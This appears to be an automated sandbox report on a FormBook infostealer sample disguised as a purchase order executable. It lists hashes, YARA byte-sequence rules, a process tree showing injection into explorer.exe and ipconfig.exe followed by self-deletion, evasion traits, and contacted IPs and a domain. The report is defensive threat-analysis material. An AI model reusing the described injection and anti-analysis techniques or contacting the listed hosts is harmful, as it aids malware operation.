
Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name: Purchase Order 40,7045$.exe
Analysis ID: 321097
MD5: 4142c1713da2f4f94bec71bfed46587b
SHA1: 06cc7bd53758a0936f4b674847411a4f912fd654
SHA256: fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags: exe, Formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: 4142C1713DA2F4F94BEC71BFED46587B)
    • Purchase Order 40,7045$.exe (PID: 4392 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045$.exe MD5: 4142C1713DA2F4F94BEC71BFED46587B)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6524 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16089:$sqlite3step: 68 34 1C 7B E1
    • 0x1619c:$sqlite3step: 68 34 1C 7B E1
    • 0x160b8:$sqlite3text: 68 38 2A 90 C5
    • 0x161dd:$sqlite3text: 68 38 2A 90 C5
    • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16089:$sqlite3step: 68 34 1C 7B E1
        • 0x1619c:$sqlite3step: 68 34 1C 7B E1
        • 0x160b8:$sqlite3text: 68 38 2A 90 C5
        • 0x161dd:$sqlite3text: 68 38 2A 90 C5
        • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Purchase Order 40,7045$.exe; Avira: detected
Multi AV Scanner detection for submitted file
Source: Purchase Order 40,7045$.exe; Virustotal: Detection: 43%
Source: Purchase Order 40,7045$.exe; ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match; File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Purchase Order 40,7045$.exe; Joe Sandbox ML: detected
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 4x nop then pop edi, 1_2_00415044
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 4x nop then pop edi, 1_2_00415C88
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 4x nop then pop ebx, 1_2_004066DA
Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 4x nop then pop edi, 5_2_02B15044
Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 4x nop then pop ebx, 5_2_02B066DA
Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 4x nop then pop edi, 5_2_02B15C88

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
Source: Joe Sandbox View; IP Address: 52.58.78.16
Source: Joe Sandbox View; IP Address: 185.201.11.126
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: DEDIPATH-LLCUS
Source: Joe Sandbox View; ASN Name: AS-HOSTINGERLT
Source: unknown; DNS traffic detected: queries for: www.handsfreedocs.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Fri, 20 Nov 2020 10:07:21 GMT; Content-Type: text/html; Content-Length: 153; Connection: close; Server: nginx/1.16.1; Data Raw: [hex dump omitted]; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

E-Banking Fraud:

Yara detected FormBook (same Yara match list as under AV Detection above)

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Purchase Order 40,7045$.exe; Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample; Static PE information: Filename: Purchase Order 40,7045$.exe
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00417BA0 NtCreateFile, 1_2_00417BA0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00417C50 NtReadFile, 1_2_00417C50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00417CD0 NtClose, 1_2_00417CD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00417D80 NtAllocateVirtualMemory, 1_2_00417D80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00417C4C NtReadFile, 1_2_00417C4C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00417CCA NtClose, 1_2_00417CCA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC98F0 NtReadVirtualMemory, LdrInitializeThunk, 1_2_00FC98F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9860 NtQuerySystemInformation, LdrInitializeThunk, 1_2_00FC9860
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9840 NtDelayExecution, LdrInitializeThunk, 1_2_00FC9840
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC99A0 NtCreateSection, LdrInitializeThunk, 1_2_00FC99A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9910 NtAdjustPrivilegesToken, LdrInitializeThunk, 1_2_00FC9910
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9A50 NtCreateFile, LdrInitializeThunk, 1_2_00FC9A50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9A20 NtResumeThread, LdrInitializeThunk, 1_2_00FC9A20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9A00 NtProtectVirtualMemory, LdrInitializeThunk, 1_2_00FC9A00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC95D0 NtClose, LdrInitializeThunk, 1_2_00FC95D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9540 NtReadFile, LdrInitializeThunk, 1_2_00FC9540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC96E0 NtFreeVirtualMemory, LdrInitializeThunk, 1_2_00FC96E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9660 NtAllocateVirtualMemory, LdrInitializeThunk, 1_2_00FC9660
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9FE0 NtCreateMutant, LdrInitializeThunk, 1_2_00FC9FE0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC97A0 NtUnmapViewOfSection, LdrInitializeThunk, 1_2_00FC97A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9780 NtMapViewOfSection, LdrInitializeThunk, 1_2_00FC9780
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9710 NtQueryInformationToken, LdrInitializeThunk, 1_2_00FC9710
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC98A0 NtWriteVirtualMemory, 1_2_00FC98A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FCB040 NtSuspendThread, 1_2_00FCB040
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9820 NtEnumerateKey, 1_2_00FC9820
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC99D0 NtCreateProcessEx, 1_2_00FC99D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9950 NtQueueApcThread, 1_2_00FC9950
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9A80 NtOpenDirectoryObject, 1_2_00FC9A80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FC9A10 NtQuerySection, 1_2_00FC9A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 1_2_00FCA3B0 NtGetContextThread, 1_2_00FCA3B0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9B00 NtSetValueKey,1_2_00FC9B00
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC95F0 NtQueryInformationFile,1_2_00FC95F0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9560 NtWriteFile,1_2_00FC9560
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCAD30 NtSetContextThread,1_2_00FCAD30
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9520 NtWaitForSingleObject,1_2_00FC9520
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC96D0 NtCreateKey,1_2_00FC96D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9670 NtQueryInformationProcess,1_2_00FC9670
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9650 NtQueryValueKey,1_2_00FC9650
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9610 NtEnumerateValueKey,1_2_00FC9610
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9770 NtSetInformationFile,1_2_00FC9770
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA770 NtOpenThread,1_2_00FCA770
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9760 NtOpenProcess,1_2_00FC9760
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9730 NtQueryVirtualMemory,1_2_00FC9730
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA710 NtOpenProcessToken,1_2_00FCA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk,5_2_02EB9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_02EB9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk,5_2_02EB9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk,5_2_02EB99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_02EB9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02EB96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk,5_2_02EB96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk,5_2_02EB9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk,5_2_02EB9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk,5_2_02EB9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB95D0 NtClose,LdrInitializeThunk,5_2_02EB95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk,5_2_02EB9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A80 NtOpenDirectoryObject,5_2_02EB9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A20 NtResumeThread,5_2_02EB9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A00 NtProtectVirtualMemory,5_2_02EB9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A10 NtQuerySection,5_2_02EB9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA3B0 NtGetContextThread,5_2_02EBA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9B00 NtSetValueKey,5_2_02EB9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB98F0 NtReadVirtualMemory,5_2_02EB98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB98A0 NtWriteVirtualMemory,5_2_02EB98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBB040 NtSuspendThread,5_2_02EBB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9820 NtEnumerateKey,5_2_02EB9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB99D0 NtCreateProcessEx,5_2_02EB99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9950 NtQueueApcThread,5_2_02EB9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9660 NtAllocateVirtualMemory,5_2_02EB9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9670 NtQueryInformationProcess,5_2_02EB9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9650 NtQueryValueKey,5_2_02EB9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9610 NtEnumerateValueKey,5_2_02EB9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB97A0 NtUnmapViewOfSection,5_2_02EB97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9760 NtOpenProcess,5_2_02EB9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA770 NtOpenThread,5_2_02EBA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9770 NtSetInformationFile,5_2_02EB9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9730 NtQueryVirtualMemory,5_2_02EB9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA710 NtOpenProcessToken,5_2_02EBA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB95F0 NtQueryInformationFile,5_2_02EB95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9560 NtWriteFile,5_2_02EB9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9520 NtWaitForSingleObject,5_2_02EB9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBAD30 NtSetContextThread,5_2_02EBAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17BA0 NtCreateFile,5_2_02B17BA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17CD0 NtClose,5_2_02B17CD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17C50 NtReadFile,5_2_02B17C50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17CCA NtClose,5_2_02B17CCA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17C4C NtReadFile,5_2_02B17C4C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E9969
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E91F9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E8D64
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E9D51
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E9597
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E07F6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041C16E
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00408A40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00408A3B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00402D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041BF03
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9B090
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01041002
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0105E824
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010520A8
